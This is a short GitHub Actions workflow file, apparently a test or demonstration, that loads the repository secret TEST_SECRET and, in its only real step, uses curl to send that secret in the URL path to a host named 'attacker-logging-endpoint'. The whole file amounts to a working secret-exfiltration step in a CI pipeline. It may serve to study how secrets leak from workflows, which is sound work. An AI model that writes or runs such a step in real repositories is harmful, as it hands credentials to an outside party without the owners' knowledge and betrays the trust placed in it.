name: test 2
on:
  workflow_dispatch:

env:
  TEST_SECRET: ${{ secrets.TEST_SECRET }}

jobs:
  test2:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: curl http://attacker-logging-endpoint.sasakiy84.net/bbb/$TEST_SECRET
